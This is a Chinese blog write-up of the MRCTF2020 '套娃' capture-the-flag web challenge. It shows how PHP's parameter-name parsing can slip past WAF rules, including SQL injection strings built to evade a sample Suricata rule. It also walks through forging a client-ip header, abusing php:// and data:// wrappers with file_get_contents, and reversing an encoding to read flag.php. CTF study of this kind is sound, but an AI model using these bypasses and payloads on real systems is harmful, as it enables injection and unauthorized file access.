[MRCTF2020]套娃 GET POST 读取字符串特性 伪造ip 伪协议伪造 file_get_contents()
作者:小教学发布时间:2023-10-02分类:程序开发学习浏览:83
导读:知识点利用PHP的字符串解析特性Bypass-FreeBuf网络安全行业门户 我们通过GETPOST传递参数是将字符串作为数组传递那么传递了参数做了什么...
知识点
利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户
我们通过 GET POST 传递参数是将字符串作为数组传递
那么传递了参数 做了什么操作
这里是通过 parse_str 来处理的
这里能发现 就是进行了两个操作
删除空白符
将有一些特殊符号转变为下划线
运用这里我们就可以绕过许多的waf 或者拦截
alert http any any -> $HOME_NET any (\
msg: "Block SQLi"; flow:established,to_server;\
content: "POST"; http_method;\
pcre: "/news_id=[^0-9]+/Pi";\
sid:1234567;\
)
例如上面存在这个规则 过滤了 news_id
我们要如何实现绕过呢, 下面这些方法都可以实现
news[id=1'+and+1=1#
news%5bid=1'+and+1=1# 这里的 %5b就是 [
news_id%00=1'+and+1=1# 通过00截断来实现绕过
{chr}foo_bar -> 20 ( )
{chr}foo_bar -> 26 (&)
{chr}foo_bar -> 2b (+)
foo{chr}bar -> 20 ( )
foo{chr}bar -> 2b (+)
foo{chr}bar -> 2e (.)
foo{chr}bar -> 5b ([)
foo{chr}bar -> 5f (_)
foo_bar{chr} -> 00 ()
foo_bar{chr} -> 26 (&)
foo_bar{chr} -> 3d (=)
这里面就显示了 我们 在每个位置可以 选择绕过的 字符
做题
首先可以通过查看源代码获得提示
<!--
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
!-->
然后我们需要绕过 第一个判断个数 又要过第二个正则 正则使用 %0A 即可
因为不会匹配第二行 但是 get又会删除第二行
第一个我们如何绕过呢 使用上面的表来桡过
所以payload就是
?b.u.p.t=23333%0A
出现了新的提示
我们去访问一下这个php
看看源代码 晕了 才知道这个 fuckjs 代码 看别人wp
放到控制台运行
我们就post 一下
Flag is here~But how to get it? <?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
这里是通过循环 可能是改变东西 不着急 到时候看看
echo 'Local access only!'."<br/>";
$ip = getIp();
这里需要伪造本地ip访问
通过 client-ip:127.0.0.1
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
这里需要本地ip 并且通过get2333打开文件 里面内容为 todat is a happy day
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
这里显然是需要通过 change来获得 flag.php 高亮
?>
代码审计一下
这里主要就是伪造ip client-ip:127.0.0.1
其次就是通过 fie_get_content读取
这里又两个方式
读取方法一
?2333=php://input
POST内容中
todat is a happy day
方法二
通过 data伪协议
?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=
这两个方法都可以
选择就是如何绕过 change 输出flag 就要开始逆向了
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
首先通过 base64解密 然后对内容进行 +
我们逆向就先对内容进行 - 然后 base64加密即可
<?php
function change($v){
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
return base64_encode($re);
}
echo change("flag.php");
获得了 flag.php的加密
ZmpdYSZmXGI=
我们现在传递参数即可
?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=
请求头
client-ip:127.0.0.1
或者
?2333=php://input&file=ZmpdYSZmXGI=
POST
todat is a happy day
请求头
client-ip:127.0.0.1
这里就得出来 flag
确实和题目中的一样 套中套啊
标签:[MRCTF2020]套娃 GET POST 读取字符串特性 伪造ip 伪协议伪造 file_get_contents()_双层小牛堡的博客
- 程序开发学习排行
-
- 1鸿蒙HarmonyOS:Web组件网页白屏检测
- 2HTTPS协议是安全传输,为啥还要再加密?
- 3HarmonyOS鸿蒙应用开发——数据持久化Preferences
- 4记解决MaterialButton背景颜色与设置值不同
- 5鸿蒙HarmonyOS实战-ArkUI组件(RelativeContainer)
- 6鸿蒙HarmonyOS实战-ArkUI组件(Stack)
- 7鸿蒙HarmonyOS实战-ArkUI组件(GridRow/GridCol)
- 8[Android][NDK][Cmake]一文搞懂Android项目中的Cmake
- 9鸿蒙HarmonyOS实战-ArkUI组件(mediaquery)
- 最近发表
-
- WooCommerce最好的WordPress常用插件下载博客插件模块的相关产品
- 羊驼机器人最好的WordPress常用插件下载博客插件模块
- IP信息记录器最好的WordPress常用插件下载博客插件模块
- Linkly for WooCommerce最好的WordPress常用插件下载博客插件模块
- 元素聚合器Forms最好的WordPress常用插件下载博客插件模块
- Promaker Chat 最好的WordPress通用插件下载 博客插件模块
- 自动更新发布日期最好的WordPress常用插件下载博客插件模块
- WordPress官方最好的获取回复WordPress常用插件下载博客插件模块
- Img to rss最好的wordpress常用插件下载博客插件模块
- WPMozo为Elementor最好的WordPress常用插件下载博客插件模块添加精简版